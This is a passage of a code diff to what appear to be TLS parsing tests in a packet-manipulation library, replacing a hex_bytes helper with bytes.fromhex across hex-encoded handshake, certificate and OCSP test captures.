a38490e9d63241a0fb3fd7701ff3b130c9aa7aa77770280b7003c1bb5e0784c34aacb74ce8114960e50eee04602a7ab20e5c878028e4292e90e40fd631fee16030300040e000000') -client_finished = hex_bytes(b'1603030106100001020100482bf86fa7047c767ecc5f46e971f2349232d57d4c40b04856b6ea2b5645b5b233c0cd2ad7b05101d6a3fcbd2698b25064501ba4f0cde40c8189abc29aebfffcb87413d4590cae7cf3589fa371ad5e0d161da9c275a4b8ca1aa9a400a3d76021f92b872403a72a22bad6368276010209ca1344971adf7d7a9cdeefd534cd933ec3d2852ea1dfff217f7cd55eac7d2b18f7c5600c56f28746389d1d6c33cd2ac24817632fc0fbd81ffcf528b1c2a5b328a0105e88513e6b2f95b51ca3adf390146662115a721bfd718eae3033388aaa5cb37e2c16428a6f7c994f961137f6a7f933327ed300f15621500d427d261f39970bbf40f4ba303963609439007d34e6bc1403030001011603030050f4b7962d5455e9244efe886bbd4156ca20936e4b8868d80c82b06ceac7cff6d69f130a610f2aa4c4fd8cb2681f84e3ebecad1b563bcd258255aa509ba2b6388f90ac5f1c1f84f1569dc3809667b86ba4') -server_finished = hex_bytes(b'14030300010116030300509e8e5fd6aebaa98263e98266fffcf7fd21eb50fb0510b8598660afb65c57a025374c1e63aff3e260dd5d027180e8aa0d85d43e0c0b54e8783e4ce51a71ef0ae555ab81404020342ca1a34643ce713688') +client_hello = bytes.fromhex('16030100c9010000c50303611a2f42b70345cfbc5c5c4da1929bea8a2cb8b1fd10ab1341e43ffaa8856a63000038c02cc030009fcca9cca8ccaac02bc02f009ec024c028006bc023c0270067c00ac0140039c009c0130033009d009c003d003c0035002f00ff01000064000b000403000102000a000c000a001d0017001e00190018337400000010000e000c02683208687474702f312e310016000000170000000d002a0028040305030603080708080809080a080b080408050806040105010601030303010302040205020602') +server_hello = bytes.fromhex('1603030059020000550303a22c975875df69bea936cbd28b083cde754693b4f34a15a036e5e57b7f4755cf20226e6386f90e3751723beea9196640d5bbe6c7c9f314568fa3645cb7218e9159003d00000dff010001000016000000170000160303036e0b00036a0003670003643082036030820248a003020102020900eb73b71c3e2f9fdc300d06092a864886f70d01010b05003045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c7464301e170d3139303231353135313430335a170d3239303231323135313430335a3045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c746430820122300d06092a864886f70d01010105000382010f003082010a0282010100d2f7d36b233a5619368fc3a7db0f2364dc71986dd4eebcbee85b783e139cfeb0a80de50147c936aa84230e2fa2eb91ef1737410387b932440ac7cfda3c5966eef88f688bcbee6a5d0dfaa075b77dfe836f2cb318375ff5be2b35f6d62dd7c4b147224f67d53d95c7fcc11cda7bc622369b4d4a685655169fb28f66e511724f0c9af2f74ea4cdf09b92f917246a582f67fade3eff7eca2c794d713c13f80cd53f847aa196d0adc04494790a628e327f4b53d05b83025c3ea541195f953ce6fc37edcc68a8fd6eca621f38bc08bc2d8d72cfcdf85c68f9f4f4485b32133c63299f85ffd62bde5a9d585e5a896f08319448277f19e86d5d6878bc53768b2ef9b3210203010001a3533051301d0603551d0e041604148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35301f0603551d230418301680148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35300f0603551d130101ff040530030101ff300d06092a864886f70d01010b050003820101003c001f0f5d106072e0beedfa47895329d4623422080e66caa4beb4c3d9b6868fa107467d6160e512ede7cbbefdeb17c09b9f594f86f1a9922c982ccf9655d4d67eda061f667eeb25fe7203bea00e40f150a490a78ca963d87c185ade8b7c294f5052fb1e1edb3403831e33e4026c8e56717cb77bc32321858be37a77fe7f5511ef8c2013c86e2730c5b2366875131cae0c7616fdc7c8605696133e7a685f20203c0db8e0ff1d1a5991d2f058f48f20b10a5fb0df27a1f9874cc0fe8d6ebf77e9a7ba38490e9d63241a0fb3fd7701ff3b130c9aa7aa77770280b7003c1bb5e0784c34aacb74ce8114960e50eee04602a7ab20e5c878028e4292e90e40fd631fee16030300040e000000') +client_finished = bytes.fromhex('1603030106100001020100482bf86fa7047c767ecc5f46e971f2349232d57d4c40b04856b6ea2b5645b5b233c0cd2ad7b05101d6a3fcbd2698b25064501ba4f0cde40c8189abc29aebfffcb87413d4590cae7cf3589fa371ad5e0d161da9c275a4b8ca1aa9a400a3d76021f92b872403a72a22bad6368276010209ca1344971adf7d7a9cdeefd534cd933ec3d2852ea1dfff217f7cd55eac7d2b18f7c5600c56f28746389d1d6c33cd2ac24817632fc0fbd81ffcf528b1c2a5b328a0105e88513e6b2f95b51ca3adf390146662115a721bfd718eae3033388aaa5cb37e2c16428a6f7c994f961137f6a7f933327ed300f15621500d427d261f39970bbf40f4ba303963609439007d34e6bc1403030001011603030050f4b7962d5455e9244efe886bbd4156ca20936e4b8868d80c82b06ceac7cff6d69f130a610f2aa4c4fd8cb2681f84e3ebecad1b563bcd258255aa509ba2b6388f90ac5f1c1f84f1569dc3809667b86ba4') +server_finished = bytes.fromhex('14030300010116030300509e8e5fd6aebaa98263e98266fffcf7fd21eb50fb0510b8598660afb65c57a025374c1e63aff3e260dd5d027180e8aa0d85d43e0c0b54e8783e4ce51a71ef0ae555ab81404020342ca1a34643ce713688') # Load TLS session r1 = TLS(client_hello) @@ -1078,8 +1078,8 @@ server_finished = r4.getlayer(TLS, 2).msg[0] assert r4.tls_session.encrypt_then_mac assert isinstance(client_finished, TLSFinished) assert isinstance(server_finished, TLSFinished) -assert client_finished.vdata == hex_bytes(b'771049b4ff714ac71253f84f') -assert server_finished.vdata == hex_bytes(b'42c9765e833997b6714fec75') +assert client_finished.vdata == bytes.fromhex('771049b4ff714ac71253f84f') +assert server_finished.vdata == bytes.fromhex('42c9765e833997b6714fec75') ### ### Other/bug tests @@ -1361,7 +1361,7 @@ test_tls_without_cryptography() = Truncated TCP segment with no_debug_dissector(): - pkt = Ether(hex_bytes('00155dfb587a00155dfb58430800450005dc54d3400070065564400410d40a00000d01bb044e8b86744e16063ac45010faf06ba9000016030317c30200005503035cb336a067d53a5d2cedbdfec666ac740afbd0637ddd13eddeab768c3c63abee20981a0000d245f1c905b329323ad67127cd4b907a49f775c331d0794149aca7cdc02800000d0005000000170000ff010001000b000ec6000ec300090530820901308206e9a00302010202132000036e72aded906765595fae000000036e72300d06092a864886f70d01010b050030818b310b30090603550406130255533113')) + pkt = Ether(bytes.fromhex('00155dfb587a00155dfb58430800450005dc54d3400070065564400410d40a00000d01bb044e8b86744e16063ac45010faf06ba9000016030317c30200005503035cb336a067d53a5d2cedbdfec666ac740afbd0637ddd13eddeab768c3c63abee20981a0000d245f1c905b329323ad67127cd4b907a49f775c331d0794149aca7cdc02800000d0005000000170000ff010001000b000ec6000ec300090530820901308206e9a00302010202132000036e72aded906765595fae000000036e72300d06092a864886f70d01010b050030818b310b30090603550406130255533113')) assert conf.padding_layer in pkt ############################################################################### @@ -1538,9 +1538,9 @@ hex_data = "16030102a8010002a4030330cc71861d50119dbe2b9c3a5207b7eff49aff19408096 key = "3476f00e12d8c768be0bd6db6af9e539441edd84b87178e8843bb2febc4b2097ac9619e65ed61837550e51834c32c7cb007b9b9a2f129d7127ee9f8bcbc2ba2141677300bc660d080d32257731d8d795bda7467df240cf07e8f1cde33bfc1f168385babee0f5834269f3c1070f7d89b3b9607b474edd306af54638d14e58cdc524b8972035a762dc446ef95b30a8c5e06876804ec9fb180f0255ea93b1438336e414761e1e1e2772909ce3fadc5282674337267f9697204b81a0b3ded2a3ecb03b46c1a4113e44b23a67d349b0406903b6acfdce0595e16b4f41dee9351f16e1267f9bdc6abbd897332552cb9b139f1556fc207fb8dee337d185acbe6b1b42c09751339e7d441933bec3cc4b24740b1640a2af73eadf700e0bee5065c38886f6a5983e1029f67085590f95f9546057725c004804cd97ed2c1c5ca0383751e77c087449719e65d9a39adad84e1bab92c0f9b7b472e58f60d4f81e3b622d7f62fd61c747e5951b54e9ef7b1a65b07e25c94baa7c19284ecf855a5cff7dae958359f3bd5d6184f11a3785026f8479d25595948160de89e8af62f306783c79b0bf28fb18da512737b52ede9f826ed95ed1ce8386e3ff3e74ba0b7ad82bef0c046223986475de12c9654f0fc3cb162d24ab02fe51120566bc993583e10149c16d953640357785e88748739cf84a3f0930fe5b4732f17f32e7e7fdf00023643a798cf7" -tls_packet = TLS(hex_bytes(hex_data)) +tls_packet = TLS(bytes.fromhex(hex_data)) assert tls_packet.msg[0].ext[8].client_shares[0].sprintf("%group%") == 'ffdhe4096' -assert tls_packet.msg[0].ext[8].client_shares[0].key_exchange == hex_bytes(key) +assert tls_packet.msg[0].ext[8].client_shares[0].key_exchange == bytes.fromhex(key) assert tls_packet.tls_session.tls13_client_pubshares['ffdhe4096'].key_size == 4096 # Build @@ -1556,9 +1556,9 @@ assert tls_packet.vdata == b'ry:\x9d/\x94j\x04U\xbf\x19\x95' = OCSP: payload after OCSP - GH3291 -data = b'1603031616020000660303602161b58e22f4966f18f9aa6afd5759f343935ed437cf09c554dd27691a1eb420a13c0000eaad0a6cd4f11bfc59788daec98422be4f3810c19669207e509aaa11c03000001e000500000023000000100005000302683200170000ff01000100000000000b000d5d000d5a0007f6308207f2308205daa00302010202136b000006c55514d0a6c4891be20000000006c5300d06092a864886f70d01010b0500304f310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e3120301e060355040313174d6963726f736f66742052534120544c53204341203031301e170d3230303930393231343530355a170d3231303930393231343530355a30223120301e060355040313177074692e73746f72652e6d6963726f736f66742e636f6d30820122300d06092a864886f70d01010105000382010f003082010a028201010094876b9572b7c3d7fbb2d569ffff6b8f716245a2d9b413c9e8238ee88d98b1002cec8c2198b52f3b7f0a679ceb1aeb2c1467d2eda3c71b4bb0756ba42354a956b8d40bd422921793b3dec0aab3f5e0b023bcb7dfdf48bd4b064c1a62255e9b58c16ad482087fd1505b01aad9474f06925f3821fbe92f680e87db3f0aa150e2066848f88ebe08d8280185bbba697b39d12e03eae6d4e481319432f2752793fcd125f2714cd92b37e3d9b8fcec7fd7b3c121fdedc42b50ff65f73352cbc1202ac59c846df2a9168c00fc4754f5e19c3b0503dbe4f58b0f8b3e0fa411d4dcb8e1acdef9a2ca7db52e282a14119e1ef3a867a3b7d8fdaccc27d3d2033bb5082a1b510203010001a38203f2308203ee30820105060a2b06010401d6790204020481f60481f300f10076007d3ef2f88fff88556824c2c0ca9e5289792bc50e78097f2e6a9768997e22f0d70000017474dd866500000403004730450221008886de3960d7fe8cbaa9bcf91f961d920af99ec72adaf07fb6f6e2759d6d045b02201f90de8ad6dc333cbf920fe6cd66b41d97a01397831b2ea39f618c1505ecc7e70077004494652eb0eeceafc44007d8a8fe28c0dae682bed8cb31b53fd33396b5b681a80000017474dd86d200000403004830460221008f66e7ce568540722b5a09d96bc08d78a1cc98dda6c7c2cda1daaa7ea49d75f302210099ccca061b9b31f938988f2e4182fcb39035f6e90d5dee8c928582bd4e5fb693302706092b060104018237150a041a3018300a06082b06010505070301300a06082b06010505070302303e06092b06010401823715070431302f06272b060104018237150887da867583eed90182c9851b81b59e6185f4eb60815d85868e4187c2985002016402012530818706082b06010505070101047b3079305306082b060105050730028647687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f4d6963726f736f6674253230525341253230544c53253230434125323030312e637274302206082b060105050730018616687474703a2f2f6f6373702e6d736f6373702e636f6d301d0603551d0e041604142746d09d123c3c91382ef590e0aab2a901f0d0c3300b0603551d0f0404030204b030780603551d110471306f821b7074692d696e742e73746f72652e6d6963726f736f66742e636f6d82177074692e73746f72652e6d6963726f736f66742e636f6d821a7074692d696e742e747261666669636d616e616765722e6e6574821b7074692d70726f642e747261666669636d616e616765722e6e65743081b00603551d1f0481a83081a53081a2a0819fa0819c864d687474703a2f2f6d7363726c2e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f63726c2f4d6963726f736f6674253230525341253230544c53253230434125323030312e63726c864b687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f63726c2f4d6963726f736f6674253230525341253230544c53253230434125323030312e63726c30570603551d200450304e304206092b0601040182372a013035303306082b060105050702011627687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f6370733008060667810c010201301f0603551d23041830168014b5760c3011cec792424d4cc75c2cc8a90ce80b64301d0603551d250416301406082b0601050507030106082b06010505070302300d06092a864886f70d01010b0500038202010086dd00ab90b01c8f5c87d59c2cc45e2cb81998699e5e97aeceea13670bbf2b76e9add7cd11bc4ef347dbab7ea7c28300223bd43e5d2904db1516c55572181534f4efc11eccf4d10a9c08ddfbff53cad870856e0e3377b7639cfc3de5d3c7ca8294cc6e7ac0cac0e1a3cd4b0b81cdcb2fa1dbf6ebc2659d6f1947e8047be27c02fba8b6a991837781cea269246353e5441aa33c8494d4591ee482f448bef23460578f96c5c1e92f5a7cd7c81815b40a7cc00aeee6976a708c1d236c7fe64a4a45f7fd83707c0e621ff7e78fe089dd3ff539148a0acba6a99a8ca630ef2e2c83529596bbb3fb1c9ea7f371158d70b36120217154003e791db16390877c83dd27543c15e73c1af5f22b4c7c73347a9b97de633abdd9413363877a8a428f18cd624e310e2ea17aa4740a167aabecfb5f5c244ef8ada6638f90592df625885b9a57ec478acca5ec2c35e6c66b597be4570057d6769f3e5c2487ea70f84ecabc0f4064bb0e7be746d652f3861b931eb0e75846253e7eeae987cf7d4193bd1dc85044ee798d821536944c7ade7e269b13e4ece47093c641e7fc8d31dc0e3d211d94e8b450cfed2733ad78fac2eae225acd505117c39243a8e24feebd47ff875643d1ef777dd2a1a18f370dd83fdf85ca2eadf3c46711aedc68fc13b1db8bf71e015c77f69882613ea096c216e759553ea475a48db8ac4e92b8b184b7dbc9d458758e85200055e3082055a30820442a00302010202100f14965f202069994fd5c7ac788941e2300d06092a864886f70d01010b0500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3230303732313233303030305a170d3234313030383037303030305a304f310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e3120301e060355040313174d6963726f736f66742052534120544c5320434120303130820222300d06092a864886f70d01010105000382020f003082020a0282020100aa6277cf9a63b20684f39036f499f31451abea950a3b4606fd11411ffe5b0658c9386e08fc4f4448cd3aa4f7bd1ea2e295b8be5120c5bfb270635d780c43c029cd64490996daafcefd055f2b2a91e8016e2e189b2c9cd0017f69f5ee3f53885cba056cbe2215671482f22cd2be5b6337ccaf6085e8966b6b8008a86ebe009c6b9570fce41812b11d1bb2c11331673334e625c9625b58827576f2fef23f3b16dfaa4283e3326d9b8e4326f0bd0e1fa1a73aaf2cc88ae6ea3ff9a5d2258f92aa1a08129cfeac4ac7c3eb8094ab8716d12349e7a4bbc791dfe679343f414aa73a26d2ea6f46e33873e6e5d491ae0b789e78a5ef96e373d8f79565e905bf4f5cff52a7f9cf08afa74d0999c071a3527aa53bd79b015403e3b662b05a279c30268eb64d56a117177a7b95a107ac5331b6d62e0fcd4174ecf101b2fd45bffc31e146423136431eb9aa055f847f91b18bae0fd754c3fdf064086ad39c8eea7934ec033d73e01b36d46811c75970b0877cc0dc6e45ca36ce43267702a9700de8b857544442c3fbac1b632608c2d2231f7f930b7c6f08549a2b4e5dce9fa53ed2985bd102dbf183ce3052483863f1b1fbed23d33e92b5278dd04273d79d236871ba595e0752a6964dbf7c4e6f742205c0538016d8604e97314f894e4863d8edf9e5c2d90eb20bf6694cbd4b01c9cbdd06bf3a02eb1cdd308b0d4a1460f9d5644f4344a1ed0203010001a382012530820121301d0603551d0e04160414b5760c3011cec792424d4cc75c2cc8a90ce80b64301f0603551d23041830168014e59d5930824758ccacfa085436867b3ab5044df0300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b0601050507030230120603551d130101ff040830060101ff020100303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d303a0603551d1f04333031302fa02da02b8629687474703a2f2f63726c332e64696769636572742e636f6d2f4f6d6e69726f6f74323032352e63726c302a0603551d20042330213008060667810c0102013008060667810c010202300b06092b0601040182372a01300d06092a864886f70d01010b050003820101009f2bbe92675bda7b8aade8ff9d4d050eedb60d1541d1e615dc0360f9f422569c48f99daeda2b3ca8c0abd0ba95b8c8c1fd7c6371b6c87a889b3046a38e7d9602e3f82204efe036c06fc2bf2e0d6eedd676280d81873e9be7a7108cda661f4051eae7bebf4e6798bb5459636f42e30f31601964000f260c97d184c0a67a193b70de4526dc96463d9c663fe13a8238e53603042857a4e94b64a218886d60898d7abe10918bace63f3130bfeb64d79e8de9c192566e388d343faecd6c6b4252623cd46989e0a057590b839fc6722442f5080384ce1663f334f105763719b206de133e137061d304f2b8476f05e38a88302b47455e7954c5f9ddebfa3f785175d25b160006d6010006d2308206ce0a0100a08206c7308206c306092b0601050507300101048206b4308206b03081a5a21604149a0190a5b9942f43bc62113fcd3d404bead25250180f32303231303230383036303930325a307a3078304c300906052b0e03021a05000414521ee36c478119a9cb03fab74e57e1197af1818b0414b5760c3011cec792424d4cc75c2cc8a90ce80b6402136b000006c55514d0a6c4891be20000000006c58000180f32303231303230383036303930325aa011180f32303231303231323036303930325aa1023000300d06092a864886f70d01010b05000382010100784c3cee7765bf5cb164c0cf465462c37e97d11041443dcd9052e413747a71f8c37a051a29cdba11ea15cac3c252eeab533c7e9141431649a3a57a7dacc1fa697fdd360c139a35af181b7154574e7b87ade8da951d1894362082f80eb56d3775e729e930a097e72a7339e6e63719acc8166fd9c77c068cc75240a3b2149da8bcc24187addcfcc7330ad057b1d7a215380ea8e060b2a85330bc262c58e119672d846b87be7edf535d68a4bc2a643516df1c134401d96f0944d4d7ebe7a769ecdcfa90418486c9d62a9a4c46e232fa94221392f59a9c8df520b19e1214ed4ac70f54367b640924c48d2d3596056ff7424fc1734b98edc02dc67d8d72f6d10f44e8a08204f0308204ec308204e8308202d0a00302010202136b00086694d48d4b29943630f5000000086694300d06092a864886f70d01010b0500304f310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e3120301e060355040313174d6963726f736f66742052534120544c53204341203031301e170d3231303230323139353831335a170d3232303230323139353831335a30353133303106035504030c2a4d6963726f736f66745f5253415f544c535f49737375696e675f43415f30315f4b657942696e64696e6730820122300d06092a864886f70d01010105000382010f003082010a0282010100b65a936febea1694e5de2b8dfc1997d265f3582b94f9be1fb56bb96e2191c5df170bb52d276c30c8fdc876f1e5b3d9b900571e17fd505534f56db0ab7953261a34911e9fb0340aac76c1baede9a580ee86eba49f0e3d7cddcc60d973c69afc157aaa5d2d6ede3cd7d9a265098ee932fde13049e0f1490b2bb88bd56b6e26033ad99f49f6b7366eb275e6550c6b74f1823ac6dcf86a843825ade03f670a7ce895c840a7cfca247bc94d608ee30feefa8346470bc69f0f2e847b5896b377d70fa20e99d3af06b2d8c286b512fad8070cdc33f3302f48ad02014a21de13d1a04fbdf6fca54cc7364e303a1b458d2093fb8e98f686c2d8da374e757f8ac25b2210e70203010001a381d63081d3301d0603551d0e041604149a0190a5b9942f43bc62113fcd3d404bead25250300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070309300f06092b060105050730010504020500301f0603551d23041830168014b5760c3011cec792424d4cc75c2cc8a90ce80b64303e06092b06010401823715070431302f06272b060104018237150887da867583eed90182c9851b81b59e6185f4eb60815d81cc9b4781c8e916020164020107301b06092b060104018237150a040e300c300a06082b06010505070309300d06092a864886f70d01010b0500038202010012d83b821ff2afc4d67c63cee2d9a1045c1a1f0628274e1da3ef03fcdc720d420423478090afe6cbbaf4c753fdcad04aef5ca919c96ab9b540a64cc23d24181e7016391e780ae56a0897a372ea9a93a959c0d713ae0cbd5e6ca420724a110ac0901d671ea8c57ba31db062a7df4bbc8cb78d820262f9ba12e4313edb85155f69c47a05fa6171958e6577b61910357a5940a3c3f186eb07a37968c7f17b5614603aae4e71cb2d5f122bbea187888452239cb9c0d338d913604034e4eb3be2639a15836d08b4b4f38287414e5cd144a23aa95edb59236205397263ead5b0ef1a2239f54149f9b5992a2964a28373652a1bb31a772a04c5d4eef2fd0e5853094590ccc5b1bcb9fc1910d31652cc8f2e72c685665834f3826613dd456655ae9c9f21283a1684123fa144bc3276f50ead086fd9c149b670b27804057472602a984a3de016f65bf0980baa8a0cbadd53b061800347fec63d80b0b68d164e295e682a890ae433c439ae04a31dd8b9260c81692a110e8583038e767ceab2b87db2067eeb1973aa5bbcd5f3b4fca071ca60361d9815e87c76c44e9791c7aa25defaaaa28d72c709ad434b44974ed50546b685e215c7a70065503f0014d5f9f1fdf851930af51e7c425d0ea0d966377f44d60bf6345a05d750d2de25ebb1957bdac56b1d9a3a4e556bf398e063062ea7e1400a279abb085c1fadb9e517231b5fdcb0d868c10c00016903001861040089499a5bf709647d1cd5e41d381c15ab96100c86f0d66d0ba53a224b2adb7897f63de0368a080e17e80da5f70505d58c5317cb047dfeeecc1c7e160fdbf4747c78fb2641b233ad509c12de3a83c3d9cab174c8ca3a748d43766a11eeaa3e8c080401006f041a8741e47e744c7b6b83abf44bc722ae7f1ca19e12989106c2a78a37c8713cac664d1d1dbff6a566b05f478f15123fb155850cafeb36120e9fb24ae4fc5f4c6e4614ebcaf1dab4a79405325d4774cef1c85facffdf57c182c7e22d29facb2ee7460b716aaa6b5e3235036d21a6212414f2d75fc85caa91317fcd0318c651f8459f32bfbda3f3b2e04c1f0c2f8982ea16d2df599133881106b27d53276703bc43230f0fdcadb8b1fe13101d1055a14d6cc6af8fa48d6dd23a0a36fb5d6ebb8f5021e3e20900b5de2442da9853d2446d75b1c2198d24cdc2a5a3d07a9aab451e196c6c49fce20bdb71a7190de2964afd934a7f14afb7872a49ab6a7a5cf2d30e000000' +data = '1603031616020000660303602161b58e22f4966f18f9aa6afd5759f343935ed437cf09c554dd27691a1eb420a13c0000eaad0a6cd4f11bfc59788daec98422be4f3810c19669207e509aaa11c03000001e000500000023000000100005000302683200170000ff01000100000000000b000d5d000d5a0007f6308207f2308205daa00302010202136b000006c55514d0a6c4891be20000000006c5300d06092a864886f70d01010b0500304f310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e3120301e060355040313174d6963726f736f66742052534120544c53204341203031301e170d3230303930393231343530355a170d3231303930393231343530355a30223120301e060355040313177074692e73746f72652e6d6963726f736f66742e636f6d30820122300d06092a864886f70d01010105000382010f003082010a028201010094876b9572b7c3d7fbb2d569ffff6b8f716245a2d9b413c9e8238ee88d98b1002cec8c2198b52f3b7f0a679ceb1aeb2c1467d2eda3c71b4bb0756ba42354a956b8d40bd422921793b3dec0aab3f5e0b023bcb7dfdf48bd4b064c1a62255e9b58c16ad482087fd1505b01aad9474f06925f3821fbe92f680e87db3f0aa150e2066848f88ebe08d8280185bbba697b39d12e03eae6d4e481319432f2752793fcd125f2714cd92b37e3d9b8fcec7fd7b3c121fdedc42b50ff65f73352cbc1202ac59c846df2a9168c00fc4754f5e19c3b0503dbe4f58b0f8b3e0fa411d4dcb8e1acdef9a2ca7db52e282a14119e1ef3a867a3b7d8fdaccc27d3d2033bb5082a1b510203010001a38203f2308203ee30820105060a2b06010401d6790204020481f60481f300f10076007d3ef2f88fff88556824c2c0ca9e5289792bc50e78097f2e6a9768997e22f0d70000017474dd866500000403004730450221008886de3960d7fe8cbaa9bcf91f961d920af99ec72adaf07fb6f6e2759d6d045b02201f90de8ad6dc333cbf920fe6cd66b41d97a01397831b2ea39f618c1505ecc7e70077004494652eb0eeceafc44007d8a8fe28c0dae682bed8cb31b53fd33396b5b681a80000017474dd86d200000403004830460221008f66e7ce568540722b5a09d96bc08d78a1cc98dda6c7c2cda1daaa7ea49d75f302210099ccca061b9b31f938988f2e4182fcb39035f6e90d5dee8c928582bd4e5fb693302706092b060104018237150a041a3018300a06082b06010505070301300a06082b06010505070302303e06092b06010401823715070431302f06272b060104018237150887da867583eed90182c9851b81b59e6185f4eb60815d85868e4187c2985002016402012530818706082b06010505070101047b3079305306082b060105050730028647687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f4d6963726f736f6674253230525341253230544c53253230434125323030312e637274302206082b060105050730018616687474703a2f2f6f6373702e6d736f6373702e636f6d301d0603551d0e041604142746d09d123c3c91382ef590e0aab2a901f0d0c3300b0603551d0f0404030204b030780603551d110471306f821b7074692d696e742e73746f72652e6d6963726f736f66742e636f6d82177074692e73746f72652e6d6963726f736f66742e636f6d821a7074692d696e742e747261666669636d616e616765722e6e6574821b7074692d70726f642e747261666669636d616e616765722e6e65743081b00603551d1f0481a83081a53081a2a0819fa0819c864d687474703a2f2f6d7363726c2e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f63726c2f4d6963726f736f6674253230525341253230544c53253230434125323030312e63726c864b687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f63726c2f4d6963726f736f6674253230525341253230544c53253230434125323030312e63726c30570603551d200450304e304206092b0601040182372a013035303306082b060105050702011627687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f6d73636f72702f6370733008060667810c010201301f0603551d23041830168014b5760c3011cec792424d4cc75c2cc8a90ce80b64301d0603551d250416301406082b0601050507030106082b06010505070302300d06092a864886f70d01010b0500038202010086dd00ab90b01c8f5c87d59c2cc45e2cb81998699e5e97aeceea13670bbf2b76e9add7cd11bc4ef347dbab7ea7c28300223bd43e5d2904db1516c55572181534f4efc11eccf4d10a9c08ddfbff53cad870856e0e3377b7639cfc3de5d3c7ca8294cc6e7ac0cac0e1a3cd4b0b81cdcb2fa1dbf6ebc2659d6f1947e8047be27c02fba8b6a991837781cea269246353e5441aa33c8494d4591ee482f448bef23460578f96c5c1e92f5a7cd7c81815b40a7cc00aeee6976a708c1d236c7fe64a4a45f7fd83707c0e621ff7e78fe089dd3ff539148a0acba6a99a8ca630ef2e2c83529596bbb3fb1c9ea7f371158d70b36120217154003e791db16390877c83dd27543c15e73c1af5f22b4c7c73347a9b97de633abdd9413363877a8a428f18cd624e310e2ea17aa4740a167aabecfb5f5c244ef8ada6638f90592df625885b9a57ec478acca5ec2c35e6c66b597be4570057d6769f3e5c2487ea70f84ecabc0f4064bb0e7be746d652f3861b931eb0e75846253e7eeae987cf7d4193bd1dc85044ee798d821536944c7ade7e269b13e4ece47093c641e7fc8d31dc0e3d211d94e8b450cfed2733ad78fac2eae225acd505117c39243a8e24feebd47ff875643d1ef777dd2a1a18f370dd83fdf85ca2eadf3c46711aedc68fc13b1db8bf71e015c77f69882613ea096c216e759553ea475a48db8ac4e92b8b184b7dbc9d458758e85200055e3082055a30820442a00302010202100f14965f202069994fd5c7ac788941e2300d06092a864886f70d01010b0500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3230303732313233303030305a170d3234313030383037303030305a304f310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e3120301e060355040313174d6963726f736f66742052534120544c5320434120303130820222300d06092a864886f70d01010105000382020f003082020a0282020100aa6277cf9a63b20684f39036f499f31451abea950a3b4606fd11411ffe5b0658c9386e08fc4f4448cd3aa4f7bd1ea2e295b8be5120c5bfb270635d780c43c029cd64490996daafcefd055f2b2a91e8016e2e189b2c9cd0017f69f5ee3f53885cba056cbe2215671482f22cd2be5b6337ccaf6085e8966b6b8008a86ebe009c6b9570fce41812b11d1bb2c11331673334e625c9625b58827576f2fef23f3b16dfaa4283e3326d9b8e4326f0bd0e1fa1a73aaf2cc88ae6ea3ff9a5d2258f92aa1a08129cfeac4ac7c3eb8094ab8716d12349e7a4bbc791dfe679343f414aa73a26d2ea6f46e33873e6e5d491ae0b789e78a5ef96e373d8f79565e905bf4f5cff52a7f9cf08afa74d0999c071a3527aa53bd79b015403e3b662b05a279c30268eb64d56a117177a7b95a107ac5331b6d62e0fcd4174ecf101b2fd45bffc31e146423136431eb9aa055f847f91b18bae0fd754c3fdf064086ad39c8eea7934ec033d73e01b36d46811c75970b0877cc0dc6e45ca36ce43267702a9700de8b857544442c3fbac1b632608c2d2231f7f930b7c6f08549a2b4e5dce9fa53ed2985bd102dbf183ce3052483863f1b1fbed23d33e92b5278dd04273d79d236871ba595e0752a6964dbf7c4e6f742205c0538016d8604e97314f894e4863d8edf9e5c2d90eb20bf6694cbd4b01c9cbdd06bf3a02eb1cdd308b0d4a1460f9d5644f4344a1ed0203010001a382012530820121301d0603551d0e04160414b5760c3011cec792424d4cc75c2cc8a90ce80b64301f0603551d23041830168014e59d5930824758ccacfa085436867b3ab5044df0300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b0601050507030230120603551d130101ff040830060101ff020100303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d303a0603551d1f04333031302fa02da02b8629687474703a2f2f63726c332e64696769636572742e636f6d2f4f6d6e69726f6f74323032352e63726c302a0603551d20042330213008060667810c0102013008060667810c010202300b06092b0601040182372a01300d06092a864886f70d01010b050003820101009f2bbe92675bda7b8aade8ff9d4d050eedb60d1541d1e615dc0360f9f422569c48f99daeda2b3ca8c0abd0ba95b8c8c1fd7c6371b6c87a889b3046a38e7d9602e3f82204efe036c06fc2bf2e0d6eedd676280d81873e9be7a7108cda661f4051eae7bebf4e6798bb5459636f42e30f31601964000f260c97d184c0a67a193b70de4526dc96463d9c663fe13a8238e53603042857a4e94b64a218886d60898d7abe10918bace63f3130bfeb64d79e8de9c192566e388d343faecd6c6b4252623cd46989e0a057590b839fc6722442f5080384ce1663f334f105763719b206de133e137061d304f2b8476f05e38a88302b47455e7954c5f9ddebfa3f785175d